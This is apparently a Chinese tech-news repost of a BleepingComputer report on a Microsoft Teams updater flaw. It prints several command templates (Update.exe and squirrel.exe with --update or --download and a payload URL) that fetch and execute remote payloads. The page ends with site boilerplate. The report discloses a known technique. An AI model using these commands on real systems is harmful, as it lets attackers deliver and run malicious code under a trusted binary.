Microsoft Teams 升级机制允许黑客执行任意文件

栏目: 编程工具 · 发布时间: 5年前

内容简介:雷锋网研究人员表示,对易受攻击的应用程序使用“update”命令可以在当前用户的上下文中执行任意二进制文件。目前,研究人员已向微软报告了这个问题。使用Microsoft Teams,将有效负载添加到其文件夹中,并使用以下任一命令自动执行:

雷锋网 (公众号:雷锋网) 消息,据 BleepingComputer 美国时间 6 月 29 日报道, 多位安全研究人员发现当前在Microsoft Teams桌面应用中实现的“update”升级机制允许黑客在系统上下载和执行任意文件,

研究人员表示,对易受攻击的应用程序使用“update”命令可以在当前用户的上下文中执行任意二进制文件。目前,研究人员已向微软报告了这个问题。

使用Microsoft Teams,将有效负载添加到其文件夹中,并使用以下任一命令自动执行:

Update.exe --update [url to payload]
squirrel.exe --update [url to payload]

这些命令可以与其他参数一起使用,包括“download”,它允许从远程位置以NuGet包的形式检索有效负载。

Update.exe --download [url to payload]
squirrel.exe --download [url to payload]

相同的方法适用于“squirrel.exe”,它也是Microsoft Teams安装包的一部分。这两个可执行文件现在都是GitHub上的Living Off The Land Binaries and Scripts(LOLBAS)数据库的一部分。

安全研究员 Reegun Richard 在 6 月 4 日向微软团队报告了这个问题。此时,应用程序仍然容易受到攻击,因为微软通知研究员该修复程序将在未来的软件版本中出现。

来源: BleepingComputer 

雷锋网版权文章,未经授权禁止转载。详情见 转载须知

Microsoft Teams 升级机制允许黑客执行任意文件

以上所述就是小编给大家介绍的《Microsoft Teams 升级机制允许黑客执行任意文件》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

文明之光 (第三册)

文明之光 (第三册)

吴军 / 人民邮电出版社 / 2015-1-1 / 59

【《文明之光》系列荣获由中宣部、中国图书评论学会和中央电视台联合推选的2014“中国好书”奖】 吴军博士从对人类文明产生了重大影响却在过去被忽略的历史故事里,选择了有意思的几十个片段特写,以人文和科技、经济结合的视角,有机地展现了一幅人类文明发展的宏大画卷。 《文明之光 》系列大致按照从地球诞生到近现代的顺序讲述了人类文明进程的各个阶段,每个章节相对独立,全景式地展现了人类文明发展历程......一起来看看 《文明之光 (第三册)》 这本书的介绍吧!

SHA 加密
SHA 加密

SHA 加密工具

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具